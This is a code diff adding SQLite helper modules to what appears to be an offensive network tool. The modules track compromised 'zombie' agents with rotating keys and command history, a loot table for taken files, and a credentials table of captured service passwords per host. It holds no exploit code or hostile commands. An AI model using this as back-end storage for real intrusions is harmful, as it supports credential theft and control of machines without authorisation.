VALUES (?, ?, ?, ?, CURRENT_TIMESTAMP, ?)
""", (
loot.get('agent_id'),
loot.get('filename'),
loot.get('filepath'),
int(loot.get('size') or 0),
loot.get('hash')
))
def get_agent_history(self, agent_id: str) -> List[dict]:
"""
Return the 100 most recent commands for an agent (most recent first).
"""
if not agent_id:
return []
rows = self.base.query("""
SELECT command, timestamp, response, success
FROM commands
WHERE agent_id = ?
ORDER BY datetime(timestamp) DESC
LIMIT 100
""", (agent_id,))
# Normalize success to bool
for r in rows:
r['success'] = bool(r.get('success'))
return rows
def purge_stale_agents(self, threshold_seconds: int) -> int:
"""
Delete agents whose last_seen is older than now - threshold_seconds.
Returns the number of deleted rows.
"""
if not threshold_seconds or threshold_seconds <= 0:
return 0
return self.base.execute("""
DELETE FROM agents
WHERE last_seen IS NOT NULL
AND datetime(last_seen) < datetime('now', ?)
""", (f'-{threshold_seconds} seconds',))
def get_stale_agents(self, threshold_seconds: int) -> list[dict]:
"""
Return the list of agents whose last_seen is older than now - threshold_seconds.
Useful for detecting/purging inactive agents.
"""
if not threshold_seconds or threshold_seconds <= 0:
return []
rows = self.base.query("""
SELECT *
FROM agents
WHERE last_seen IS NOT NULL
AND datetime(last_seen) < datetime('now', ?)
""", (f'-{threshold_seconds} seconds',))
return rows or []
# =========================================================================
# AGENT KEY MANAGEMENT
# =========================================================================
def get_active_key(self, agent_id: str) -> str | None:
"""Return the active key (base64) for an agent, or None"""
row = self.base.query_one("""
SELECT key_b64 FROM agent_keys
WHERE agent_id=? AND active=1
ORDER BY version DESC
LIMIT 1
""", (agent_id,))
return row["key_b64"] if row else None
def list_keys(self, agent_id: str) -> list[dict]:
"""List all keys for an agent (versions, states)"""
return self.base.query("""
SELECT id, agent_id, key_b64, version, created_at, rotated_at, revoked_at, active
FROM agent_keys
WHERE agent_id=?
ORDER BY version DESC
""", (agent_id,))
def _next_key_version(self, agent_id: str) -> int:
"""Get next key version number for an agent"""
row = self.base.query_one("SELECT COALESCE(MAX(version),0) AS v FROM agent_keys WHERE agent_id=?", (agent_id,))
return int(row["v"] or 0) + 1
def save_new_key(self, agent_id: str, key_b64: str) -> int:
"""
Record a new key for an agent as the next version, marked active (intended for the first key, when no active key exists yet).
Returns the version created.
"""
v = self._next_key_version(agent_id)
self.base.execute("""
INSERT INTO agent_keys(agent_id, key_b64, version, active)
VALUES(?,?,?,1)
""", (agent_id, key_b64, v))
return v
def rotate_key(self, agent_id: str, new_key_b64: str) -> int:
"""
Rotate keys: deactivate the current active key (setting rotated_at), then insert the new key as the next version with active=1.
Returns the new version number.
"""
with self.base.transaction():
# Disable existing active key
self.base.execute("""
UPDATE agent_keys
SET active=0, rotated_at=CURRENT_TIMESTAMP
WHERE agent_id=? AND active=1
""", (agent_id,))
# Insert new
v = self._next_key_version(agent_id)
self.base.execute("""
INSERT INTO agent_keys(agent_id, key_b64, version, active)
VALUES(?,?,?,1)
""", (agent_id, new_key_b64, v))
return v
def revoke_keys(self, agent_id: str) -> int:
"""
Revoke keys: set active=0 and revoked_at=CURRENT_TIMESTAMP on every currently active key of the agent.
Returns the number of affected rows.
"""
return self.base.execute("""
UPDATE agent_keys
SET active=0, revoked_at=CURRENT_TIMESTAMP
WHERE agent_id=? AND active=1
""", (agent_id,))
def verify_client_key(self, agent_id: str, key_b64: str) -> bool:
"""True if the provided key matches an active key for this agent"""
row = self.base.query_one("""
SELECT 1 FROM agent_keys
WHERE agent_id=? AND key_b64=? AND active=1
LIMIT 1
""", (agent_id, key_b64))
return bool(row)
def migrate_keys_from_file(self, json_path: str) -> int:
"""
One-shot migration from a keys.json in format {agent_id: key_b64}.
For each agent without an active key, insert the key as version 1.
Returns the number of keys inserted.
"""
if not json_path or not os.path.exists(json_path):
return 0
inserted = 0
try:
with open(json_path, "r", encoding="utf-8") as f:
data = json.load(f)
if not isinstance(data, dict):
return 0
with self.base.transaction():
for agent_id, key_b64 in data.items():
if not self.get_active_key(agent_id):
self.save_new_key(agent_id, key_b64)
inserted += 1
except Exception:
pass
return inserted
# =========================================================================
# HELPER METHODS
# =========================================================================
def _refresh_zombie_counter(self) -> None:
"""
Update stats.zombie_count with the number of online agents.
Won't fail if the column doesn't exist yet.
"""
try:
row = self.base.query_one("SELECT COUNT(*) AS c FROM agents WHERE LOWER(status)='online';")
count = int(row['c'] if row else 0)
updated = self.base.execute("UPDATE stats SET zombie_count=? WHERE id=1;", (count,))
if not updated:
# Ensure singleton row exists
self.base.execute("INSERT OR IGNORE INTO stats(id) VALUES(1);")
self.base.execute("UPDATE stats SET zombie_count=? WHERE id=1;", (count,))
except sqlite3.OperationalError:
# Column absent: add it properly and retry
try:
self.base.execute("ALTER TABLE stats ADD COLUMN zombie_count INTEGER DEFAULT 0;")
self.base.execute("UPDATE stats SET zombie_count=0 WHERE id=1;")
row = self.base.query_one("SELECT COUNT(*) AS c FROM agents WHERE LOWER(status)='online';")
count = int(row['c'] if row else 0)
self.base.execute("UPDATE stats SET zombie_count=? WHERE id=1;", (count,))
except Exception:
pass
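A self-contained sketch of the key lifecycle implemented above (paths and base64 strings are placeholders, not a required key format):

```python
from db_utils import DatabaseBase, AgentOps

base = DatabaseBase("/tmp/bjorn_agents_example.db")    # illustrative path
agents = AgentOps(base)
agents.create_tables()

v1 = agents.save_new_key("agent-01", "b2xkLWtleQ==")   # version 1, active
assert agents.verify_client_key("agent-01", "b2xkLWtleQ==")

v2 = agents.rotate_key("agent-01", "bmV3LWtleQ==")     # v1 gets rotated_at, v2 becomes active
assert agents.get_active_key("agent-01") == "bmV3LWtleQ=="

agents.revoke_keys("agent-01")                          # no active key left
assert agents.get_active_key("agent-01") is None
```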

76
db_utils/backups.py Normal file
View File

@@ -0,0 +1,76 @@
# db_utils/backups.py
# Backup registry and management operations
from typing import Any, Dict, List
import logging
from logger import Logger
logger = Logger(name="db_utils.backups", level=logging.DEBUG)
class BackupOps:
"""Backup registry and management operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create backups registry table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS backups (
id INTEGER PRIMARY KEY AUTOINCREMENT,
filename TEXT UNIQUE NOT NULL,
description TEXT,
date TEXT,
type TEXT DEFAULT 'User Backup',
is_default INTEGER DEFAULT 0,
is_restore INTEGER DEFAULT 0,
is_github INTEGER DEFAULT 0,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
logger.debug("Backups table created/verified")
# =========================================================================
# BACKUP OPERATIONS
# =========================================================================
def add_backup(self, filename: str, description: str, date: str,
type_: str = "User Backup", is_default: bool = False,
is_restore: bool = False, is_github: bool = False):
"""Insert or update a backup registry entry"""
self.base.execute("""
INSERT INTO backups(filename,description,date,type,is_default,is_restore,is_github)
VALUES(?,?,?,?,?,?,?)
ON CONFLICT(filename) DO UPDATE SET
description=excluded.description,
date=excluded.date,
type=excluded.type,
is_default=excluded.is_default,
is_restore=excluded.is_restore,
is_github=excluded.is_github;
""", (filename, description, date, type_, int(is_default),
int(is_restore), int(is_github)))
def list_backups(self) -> List[Dict[str, Any]]:
"""List all backups ordered by date descending"""
return self.base.query("""
SELECT filename, description, date, type,
is_default, is_restore, is_github
FROM backups
ORDER BY date DESC;
""")
def delete_backup(self, filename: str) -> None:
"""Delete a backup entry by filename"""
self.base.execute("DELETE FROM backups WHERE filename=?;", (filename,))
def clear_default_backup(self) -> None:
"""Clear the default flag on all backups"""
self.base.execute("UPDATE backups SET is_default=0;")
def set_default_backup(self, filename: str) -> None:
"""Set the default flag on a specific backup"""
self.clear_default_backup()
self.base.execute("UPDATE backups SET is_default=1 WHERE filename=?;", (filename,))

159
db_utils/base.py Normal file
View File

@@ -0,0 +1,159 @@
# db_utils/base.py
# Base database connection and transaction management
import sqlite3
import time
from contextlib import contextmanager
from threading import RLock
from typing import Any, Dict, Iterable, List, Optional, Tuple
import logging
from logger import Logger
logger = Logger(name="db_utils.base", level=logging.DEBUG)
class DatabaseBase:
"""
Base database manager providing connection, transaction, and query primitives.
All specialized operation modules inherit access to these primitives.
"""
def __init__(self, db_path: str):
self.db_path = db_path
# Connection with optimized settings for constrained devices (e.g., Raspberry Pi)
self._conn = sqlite3.connect(
self.db_path,
check_same_thread=False,
isolation_level=None # Autocommit mode (we manage transactions explicitly)
)
self._conn.row_factory = sqlite3.Row
self._lock = RLock()
# Small in-process cache for frequently refreshed UI counters
self._cache_ttl = 5.0 # seconds
self._stats_cache = {'data': None, 'timestamp': 0}
# Apply PRAGMA tuning
with self._lock:
cur = self._conn.cursor()
# Optimize SQLite for Raspberry Pi / flash storage
cur.execute("PRAGMA journal_mode=WAL;")
cur.execute("PRAGMA synchronous=NORMAL;")
cur.execute("PRAGMA foreign_keys=ON;")
cur.execute("PRAGMA cache_size=2000;") # Increase page cache
cur.execute("PRAGMA temp_store=MEMORY;") # Use RAM for temporary objects
cur.close()
logger.info(f"DatabaseBase initialized: {db_path}")
# =========================================================================
# CORE CONCURRENCY + SQL PRIMITIVES
# =========================================================================
@contextmanager
def _cursor(self):
"""Thread-safe cursor context manager"""
with self._lock:
cur = self._conn.cursor()
try:
yield cur
finally:
cur.close()
@contextmanager
def transaction(self, immediate: bool = True):
"""Transactional block with automatic rollback on error"""
with self._lock:
try:
self._conn.execute("BEGIN IMMEDIATE;" if immediate else "BEGIN;")
yield
self._conn.execute("COMMIT;")
except Exception:
self._conn.execute("ROLLBACK;")
raise
def execute(self, sql: str, params: Iterable[Any] = (), many: bool = False) -> int:
"""Execute a DML statement. Supports batch mode via `many=True`"""
with self._cursor() as c:
if many and params and isinstance(params, (list, tuple)) and isinstance(params[0], (list, tuple)):
c.executemany(sql, params)
return c.rowcount if c.rowcount is not None else 0
c.execute(sql, params)
return c.rowcount if c.rowcount is not None else 0
def executemany(self, sql: str, seq_of_params: Iterable[Iterable[Any]]) -> int:
"""Convenience wrapper around `execute(..., many=True)`"""
return self.execute(sql, seq_of_params, many=True)
def query(self, sql: str, params: Iterable[Any] = ()) -> List[Dict[str, Any]]:
"""Execute a SELECT and return rows as list[dict]"""
with self._cursor() as c:
c.execute(sql, params)
rows = c.fetchall()
return [dict(r) for r in rows]
def query_one(self, sql: str, params: Iterable[Any] = ()) -> Optional[Dict[str, Any]]:
"""Execute a SELECT and return a single row as dict (or None)"""
with self._cursor() as c:
c.execute(sql, params)
row = c.fetchone()
return dict(row) if row else None
# =========================================================================
# CACHE MANAGEMENT
# =========================================================================
def invalidate_stats_cache(self):
"""Invalidate the small in-memory stats cache"""
self._stats_cache = {'data': None, 'timestamp': 0}
# =========================================================================
# SCHEMA HELPERS
# =========================================================================
def _table_exists(self, name: str) -> bool:
"""Return True if a table exists in the current database"""
row = self.query("SELECT name FROM sqlite_master WHERE type='table' AND name=?", (name,))
return bool(row)
def _column_names(self, table: str) -> List[str]:
"""Return a list of column names for a given table (empty if table missing)"""
with self._cursor() as c:
c.execute(f"PRAGMA table_info({table});")
return [r[1] for r in c.fetchall()]
def _ensure_column(self, table: str, column: str, ddl: str) -> None:
"""Add a column with the provided DDL if it does not exist yet"""
cols = self._column_names(table) if self._table_exists(table) else []
if column not in cols:
self.execute(f"ALTER TABLE {table} ADD COLUMN {ddl};")
# =========================================================================
# MAINTENANCE OPERATIONS
# =========================================================================
def checkpoint(self, mode: str = "TRUNCATE") -> Tuple[int, int, int]:
"""
Force a WAL checkpoint. Returns (busy, log_frames, checkpointed_frames).
mode ∈ {PASSIVE, FULL, RESTART, TRUNCATE}
"""
mode = (mode or "PASSIVE").upper()
if mode not in {"PASSIVE", "FULL", "RESTART", "TRUNCATE"}:
mode = "PASSIVE"
with self._cursor() as c:
c.execute(f"PRAGMA wal_checkpoint({mode});")
row = c.fetchone()
if not row:
return (0, 0, 0)
vals = tuple(row)
return (int(vals[0]), int(vals[1]), int(vals[2]))
def optimize(self) -> None:
"""Run PRAGMA optimize to help the query planner update statistics"""
self.execute("PRAGMA optimize;")
def vacuum(self) -> None:
"""Vacuum the database to reclaim space (use sparingly on flash media)"""
self.execute("VACUUM;")

126
db_utils/comments.py Normal file
View File

@@ -0,0 +1,126 @@
# db_utils/comments.py
# Comment and status message operations
import json
import os
from typing import Any, Dict, List, Optional, Tuple
import logging
from logger import Logger
logger = Logger(name="db_utils.comments", level=logging.DEBUG)
class CommentOps:
"""Comment and status message management operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create comments table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS comments (
id INTEGER PRIMARY KEY AUTOINCREMENT,
text TEXT NOT NULL,
status TEXT NOT NULL,
theme TEXT DEFAULT 'general',
lang TEXT DEFAULT 'fr',
weight INTEGER DEFAULT 1,
created_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_comments_dedup
ON comments(text, status, theme, lang);
""")
except Exception:
pass
logger.debug("Comments table created/verified")
# =========================================================================
# COMMENT OPERATIONS
# =========================================================================
def count_comments(self) -> int:
"""Return total number of comment rows"""
row = self.base.query_one("SELECT COUNT(1) c FROM comments;")
return int(row["c"]) if row else 0
def insert_comments(self, comments: List[Tuple[str, str, str, str, int]]):
"""Batch insert of comments (dedup via UNIQUE or INSERT OR IGNORE semantics)"""
if not comments:
return
self.base.executemany(
"INSERT OR IGNORE INTO comments(text,status,theme,lang,weight) VALUES(?,?,?,?,?)",
comments
)
def import_comments_from_json(
self,
json_path: str,
lang: Optional[str] = None,
default_theme: str = "general",
default_weight: int = 1,
clear_existing: bool = False
) -> int:
"""
Import comments from a JSON mapping {status: [strings]}.
Language comes from the `lang` argument when provided, otherwise it is auto-detected from the filename (comments.xx.json), falling back to 'en'.
"""
if not json_path or not os.path.exists(json_path):
return 0
try:
with open(json_path, "r", encoding="utf-8") as f:
data = json.load(f)
except Exception:
return 0
if not isinstance(data, dict):
return 0
# Determine language
if not lang:
# From filename (comments.xx.json)
base = os.path.basename(json_path).lower()
if "comments." in base:
parts = base.split(".")
if len(parts) >= 3:
lang = parts[-2]
# Fallback
lang = (lang or "en").lower()
rows: List[Tuple[str, str, str, str, int]] = []
for status, items in data.items():
if not isinstance(items, list):
continue
for txt in items:
t = str(txt).strip()
if not t:
continue
rows.append((t, str(status), str(status), lang, int(default_weight)))
if not rows:
return 0
with self.base.transaction(immediate=True):
if clear_existing:
self.base.execute("DELETE FROM comments;")
self.insert_comments(rows)
return len(rows)
def random_comment_for(self, status: str, lang: str = "en") -> Optional[Dict[str, Any]]:
"""Pick a random comment for the given status/language"""
rows = self.base.query("""
SELECT id, text, status, theme, lang, weight
FROM comments
WHERE status=? AND lang=?
ORDER BY RANDOM()
LIMIT 1;
""", (status, lang))
return rows[0] if rows else None
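A self-contained sketch of the comment flow; the tuples mirror what a `{status: [strings]}` JSON import would produce (texts are invented):

```python
from db_utils import DatabaseBase, CommentOps

base = DatabaseBase("/tmp/bjorn_comments_example.db")  # illustrative path
comments = CommentOps(base)
comments.create_tables()

# (text, status, theme, lang, weight) — same shape import_comments_from_json() builds
comments.insert_comments([
    ("Sharpening my axe...", "IDLE", "IDLE", "en", 1),
    ("Sniffing the network.", "SCANNING", "SCANNING", "en", 1),
])
print(comments.random_comment_for("SCANNING", lang="en"))
```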

63
db_utils/config.py Normal file
View File

@@ -0,0 +1,63 @@
# db_utils/config.py
# Configuration management operations
import json
import ast
from typing import Any, Dict
import logging
from logger import Logger
logger = Logger(name="db_utils.config", level=logging.DEBUG)
class ConfigOps:
"""Configuration key-value store operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create config table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS config (
key TEXT PRIMARY KEY,
value TEXT
);
""")
logger.debug("Config table created/verified")
def get_config(self) -> Dict[str, Any]:
"""Load config as typed dict (tries JSON, then literal_eval, then raw)"""
rows = self.base.query("SELECT key, value FROM config;")
out: Dict[str, Any] = {}
for r in rows:
k = r["key"]
raw = r["value"]
try:
v = json.loads(raw)
except Exception:
try:
v = ast.literal_eval(raw)
except Exception:
v = raw
out[k] = v
return out
def save_config(self, config: Dict[str, Any]) -> None:
"""Save the full config mapping to the database (JSON-serialized)"""
if not config:
return
pairs = []
for k, v in config.items():
try:
s = json.dumps(v, ensure_ascii=False)
except Exception:
s = json.dumps(str(v), ensure_ascii=False)
pairs.append((str(k), s))
with self.base.transaction():
self.base.execute("DELETE FROM config;")
self.base.executemany("INSERT INTO config(key,value) VALUES(?,?);", pairs)
logger.info(f"Saved {len(pairs)} config entries")

124
db_utils/credentials.py Normal file
View File

@@ -0,0 +1,124 @@
# db_utils/credentials.py
# Credential storage and management operations
import json
import sqlite3
from typing import Any, Dict, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.credentials", level=logging.DEBUG)
class CredentialOps:
"""Credential storage and retrieval operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create credentials table"""
self.base.execute("""
CREATE TABLE IF NOT EXISTS creds (
id INTEGER PRIMARY KEY AUTOINCREMENT,
service TEXT NOT NULL,
mac_address TEXT,
ip TEXT,
hostname TEXT,
"user" TEXT,
"password" TEXT,
port INTEGER,
"database" TEXT,
extra TEXT,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
# Indexes to support real UPSERT and dedup
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_creds_identity
ON creds(service, mac_address, ip, "user", "database", port);
""")
except Exception:
pass
# Optional NULL-safe dedup guard for future rows
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_creds_identity_norm
ON creds(
service,
COALESCE(mac_address,''),
COALESCE(ip,''),
COALESCE("user",''),
COALESCE("database",''),
COALESCE(port,0)
);
""")
except Exception:
pass
logger.debug("Credentials table created/verified")
# =========================================================================
# CREDENTIAL OPERATIONS
# =========================================================================
def insert_cred(self, service: str, mac: Optional[str] = None, ip: Optional[str] = None,
hostname: Optional[str] = None, user: Optional[str] = None,
password: Optional[str] = None, port: Optional[int] = None,
database: Optional[str] = None, extra: Optional[Dict[str, Any]] = None):
"""Insert or update a credential identity; last_seen is touched on update"""
self.base.invalidate_stats_cache()
# NULL-safe normalization to keep a single identity form
mac_n = mac or ""
ip_n = ip or ""
user_n = user or ""
db_n = database or ""
port_n = int(port or 0)
js = json.dumps(extra, ensure_ascii=False) if extra else None
try:
self.base.execute("""
INSERT INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES(?,?,?,?,?,?,?,?,?)
ON CONFLICT(service, mac_address, ip, "user", "database", port) DO UPDATE SET
"password"=excluded."password",
hostname=COALESCE(excluded.hostname, creds.hostname),
last_seen=CURRENT_TIMESTAMP,
extra=COALESCE(excluded.extra, creds.extra);
""", (service, mac_n, ip_n, hostname, user_n, password, port_n, db_n, js))
except sqlite3.OperationalError:
# Fallback if unique index not available: manual upsert
row = self.base.query_one("""
SELECT id FROM creds
WHERE service=? AND COALESCE(mac_address,'')=? AND COALESCE(ip,'')=?
AND COALESCE("user",'')=? AND COALESCE("database",'')=? AND COALESCE(port,0)=?
LIMIT 1
""", (service, mac_n, ip_n, user_n, db_n, port_n))
if row:
self.base.execute("""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP,
extra=COALESCE(?, extra)
WHERE id=?
""", (password, hostname, js, row["id"]))
else:
self.base.execute("""
INSERT INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES(?,?,?,?,?,?,?,?,?)
""", (service, mac_n, ip_n, hostname, user_n, password, port_n, db_n, js))
def list_creds_grouped(self) -> List[Dict[str, Any]]:
"""List all credential rows grouped/sorted by service/ip/user/port for UI"""
return self.base.query("""
SELECT service, mac_address, ip, hostname, "user", "password", port, "database", last_seen
FROM creds
ORDER BY service, ip, "user", port
""")

480
db_utils/hosts.py Normal file
View File

@@ -0,0 +1,480 @@
# db_utils/hosts.py
# Host and network device management operations
import time
import sqlite3
from typing import Any, Dict, Iterable, List, Optional
import logging
from logger import Logger
logger = Logger(name="db_utils.hosts", level=logging.DEBUG)
class HostOps:
"""Host management and tracking operations"""
def __init__(self, base):
self.base = base
def create_tables(self):
"""Create hosts and related tables"""
# Main hosts table
self.base.execute("""
CREATE TABLE IF NOT EXISTS hosts (
mac_address TEXT PRIMARY KEY,
ips TEXT,
hostnames TEXT,
alive INTEGER DEFAULT 0,
ports TEXT,
vendor TEXT,
essid TEXT,
previous_hostnames TEXT,
previous_ips TEXT,
previous_ports TEXT,
previous_essids TEXT,
first_seen INTEGER,
last_seen INTEGER,
updated_at TEXT DEFAULT CURRENT_TIMESTAMP
);
""")
self.base.execute("CREATE INDEX IF NOT EXISTS idx_hosts_alive ON hosts(alive);")
# Hostname history table
self.base.execute("""
CREATE TABLE IF NOT EXISTS hostnames_history(
id INTEGER PRIMARY KEY AUTOINCREMENT,
mac_address TEXT NOT NULL,
hostname TEXT NOT NULL,
first_seen TEXT DEFAULT CURRENT_TIMESTAMP,
last_seen TEXT DEFAULT CURRENT_TIMESTAMP,
is_current INTEGER DEFAULT 1,
UNIQUE(mac_address, hostname)
);
""")
# Guarantee a single current hostname per MAC
try:
# One and only one "current" hostname row per MAC in history
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS uq_hostname_current
ON hostnames_history(mac_address)
WHERE is_current=1;
""")
except Exception:
pass
# Uniqueness for real MACs only (allows legacy stubs in old DBs but our scanner no longer writes them)
try:
self.base.execute("""
CREATE UNIQUE INDEX IF NOT EXISTS ux_hosts_real_mac
ON hosts(mac_address)
WHERE instr(mac_address, ':') > 0;
""")
except Exception:
pass
logger.debug("Hosts tables created/verified")
# =========================================================================
# HOST CRUD OPERATIONS
# =========================================================================
def get_all_hosts(self) -> List[Dict[str, Any]]:
"""Get all hosts with current/previous IPs/ports/essids ordered by liveness then MAC"""
return self.base.query("""
SELECT mac_address, ips, previous_ips,
hostnames, previous_hostnames,
alive,
ports, previous_ports,
vendor, essid, previous_essids,
first_seen, last_seen
FROM hosts
ORDER BY alive DESC, mac_address;
""")
def update_host(self, mac_address: str, ips: Optional[str] = None,
hostnames: Optional[str] = None, alive: Optional[int] = None,
ports: Optional[str] = None, vendor: Optional[str] = None,
essid: Optional[str] = None):
"""
Partial upsert of the host row. None/'' fields do not erase existing values.
For automatic tracking of previous_* fields, use update_*_current helpers instead.
"""
# --- Hardening: normalize and guard ---
# Always store normalized lowercase MACs; refuse 'ip:' stubs defensively.
mac_address = (mac_address or "").strip().lower()
if mac_address.startswith("ip:"):
raise ValueError("stub MAC not allowed (scanner runs in no-stub mode)")
self.base.invalidate_stats_cache()
now = int(time.time())
self.base.execute("""
INSERT INTO hosts(mac_address, ips, hostnames, alive, ports, vendor, essid,
first_seen, last_seen, updated_at)
VALUES(?, ?, ?, COALESCE(?, 0), ?, ?, ?, ?, ?, CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ips = COALESCE(NULLIF(excluded.ips, ''), hosts.ips),
hostnames = COALESCE(NULLIF(excluded.hostnames, ''), hosts.hostnames),
alive = COALESCE(excluded.alive, hosts.alive),
ports = COALESCE(NULLIF(excluded.ports, ''), hosts.ports),
vendor = COALESCE(NULLIF(excluded.vendor, ''), hosts.vendor),
essid = COALESCE(NULLIF(excluded.essid, ''), hosts.essid),
last_seen = ?,
updated_at= CURRENT_TIMESTAMP;
""", (mac_address, ips, hostnames, alive, ports, vendor, essid, now, now, now))
# =========================================================================
# HOSTNAME OPERATIONS
# =========================================================================
def update_hostname(self, mac_address: str, new_hostname: str):
"""Update current hostname + track previous/current in both hosts and history tables"""
new_hostname = (new_hostname or "").strip()
if not new_hostname:
return
with self.base.transaction(immediate=True):
row = self.base.query(
"SELECT hostnames, previous_hostnames FROM hosts WHERE mac_address=? LIMIT 1;",
(mac_address,)
)
curr = (row[0]["hostnames"] or "") if row else ""
prev = (row[0]["previous_hostnames"] or "") if row else ""
curr_list = [h for h in curr.split(';') if h]
prev_list = [h for h in prev.split(';') if h]
if new_hostname in curr_list:
curr_list = [new_hostname] + [h for h in curr_list if h != new_hostname]
next_curr = ';'.join(curr_list)
next_prev = ';'.join(prev_list)
else:
merged_prev = list(dict.fromkeys(curr_list + prev_list))[:50] # cap at 50
next_curr = new_hostname
next_prev = ';'.join(merged_prev)
self.base.execute("""
INSERT INTO hosts(mac_address, hostnames, previous_hostnames, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
hostnames = excluded.hostnames,
previous_hostnames = excluded.previous_hostnames,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, next_curr, next_prev))
# Update hostname history table
self.base.execute("""
UPDATE hostnames_history
SET is_current=0, last_seen=CURRENT_TIMESTAMP
WHERE mac_address=? AND is_current=1;
""", (mac_address,))
self.base.execute("""
INSERT INTO hostnames_history(mac_address, hostname, is_current)
VALUES(?,?,1)
ON CONFLICT(mac_address, hostname) DO UPDATE SET
is_current=1, last_seen=CURRENT_TIMESTAMP;
""", (mac_address, new_hostname))
def get_current_hostname(self, mac_address: str) -> Optional[str]:
"""Get the current hostname from history when available; fallback to hosts.hostnames"""
row = self.base.query("""
SELECT hostname FROM hostnames_history
WHERE mac_address=? AND is_current=1 LIMIT 1;
""", (mac_address,))
if row:
return row[0]["hostname"]
row = self.base.query("SELECT hostnames FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
if row and row[0]["hostnames"]:
return row[0]["hostnames"].split(';', 1)[0]
return None
def record_hostname_seen(self, mac_address: str, hostname: str):
"""Alias for update_hostname: mark a hostname as seen/current"""
self.update_hostname(mac_address, hostname)
def list_hostname_history(self, mac_address: str) -> List[Dict[str, Any]]:
"""Return the full hostname history for a MAC (current first)"""
return self.base.query("""
SELECT hostname, first_seen, last_seen, is_current
FROM hostnames_history
WHERE mac_address=?
ORDER BY is_current DESC, last_seen DESC, first_seen DESC;
""", (mac_address,))
# =========================================================================
# IP OPERATIONS
# =========================================================================
def update_ips_current(self, mac_address: str, current_ips: Iterable[str], cap_prev: int = 200):
"""Replace current IP set and roll removed IPs into previous_ips (deduped, size-capped)"""
cur_set = {ip.strip() for ip in (current_ips or []) if ip}
row = self.base.query("SELECT ips, previous_ips FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
prev_cur = set(self._parse_list(row[0]["ips"])) if row else set()
prev_prev = set(self._parse_list(row[0]["previous_ips"])) if row else set()
removed = prev_cur - cur_set
prev_prev |= removed
if len(prev_prev) > cap_prev:
prev_prev = set(sorted(prev_prev, key=self._sort_ip_key)[:cap_prev])
ips_sorted = ";".join(sorted(cur_set, key=self._sort_ip_key))
prev_sorted = ";".join(sorted(prev_prev, key=self._sort_ip_key))
self.base.execute("""
INSERT INTO hosts(mac_address, ips, previous_ips, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ips = excluded.ips,
previous_ips = excluded.previous_ips,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, ips_sorted, prev_sorted))
# =========================================================================
# PORT OPERATIONS
# =========================================================================
def update_ports_current(self, mac_address: str, current_ports: Iterable[int], cap_prev: int = 500):
"""Replace current port set and roll removed ports into previous_ports (deduped, size-capped)"""
cur_set = set(int(p) for p in (current_ports or []) if str(p).isdigit())
row = self.base.query("SELECT ports, previous_ports FROM hosts WHERE mac_address=? LIMIT 1;", (mac_address,))
prev_cur = set(int(p) for p in self._parse_list(row[0]["ports"])) if row else set()
prev_prev = set(int(p) for p in self._parse_list(row[0]["previous_ports"])) if row else set()
removed = prev_cur - cur_set
prev_prev |= removed
if len(prev_prev) > cap_prev:
prev_prev = set(sorted(prev_prev)[:cap_prev])
ports_sorted = ";".join(str(p) for p in sorted(cur_set))
prev_sorted = ";".join(str(p) for p in sorted(prev_prev))
self.base.execute("""
INSERT INTO hosts(mac_address, ports, previous_ports, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
ports = excluded.ports,
previous_ports = excluded.previous_ports,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, ports_sorted, prev_sorted))
# =========================================================================
# ESSID OPERATIONS
# =========================================================================
def update_essid_current(self, mac_address: str, new_essid: Optional[str], cap_prev: int = 50):
"""Update current ESSID and move previous one into previous_essids if it changed"""
new_essid = (new_essid or "").strip()
row = self.base.query(
"SELECT essid, previous_essids FROM hosts WHERE mac_address=? LIMIT 1;",
(mac_address,)
)
if row:
old = (row[0]["essid"] or "").strip()
prev_prev = self._parse_list(row[0]["previous_essids"]) or []
else:
old = ""
prev_prev = []
if old and new_essid and new_essid == old:
essid = new_essid
prev_joined = ";".join(prev_prev)
else:
if old and old not in prev_prev:
prev_prev = [old] + prev_prev
prev_prev = prev_prev[:cap_prev]
essid = new_essid
prev_joined = ";".join(prev_prev)
self.base.execute("""
INSERT INTO hosts(mac_address, essid, previous_essids, updated_at)
VALUES(?,?,?,CURRENT_TIMESTAMP)
ON CONFLICT(mac_address) DO UPDATE SET
essid = excluded.essid,
previous_essids = excluded.previous_essids,
updated_at = CURRENT_TIMESTAMP;
""", (mac_address, essid, prev_joined))
# =========================================================================
# IP STUB MERGING
# =========================================================================
def merge_ip_stub_into_real(self, ip: str, real_mac: str,
hostname: Optional[str] = None, essid_hint: Optional[str] = None):
"""
Merge a host 'IP:<ip>' stub with the host at 'real_mac' (if present) or rename the stub.
- Unifies ips, hostnames, ports, vendor, essid, first_seen/last_seen, alive.
- Updates tables that have a 'mac_address' column to point to the real MAC.
- ESSID tolerance: if one of the two values is empty, keep the non-empty one.
- If the host 'real_mac' doesn't exist yet, simply rename the stub -> real_mac.
"""
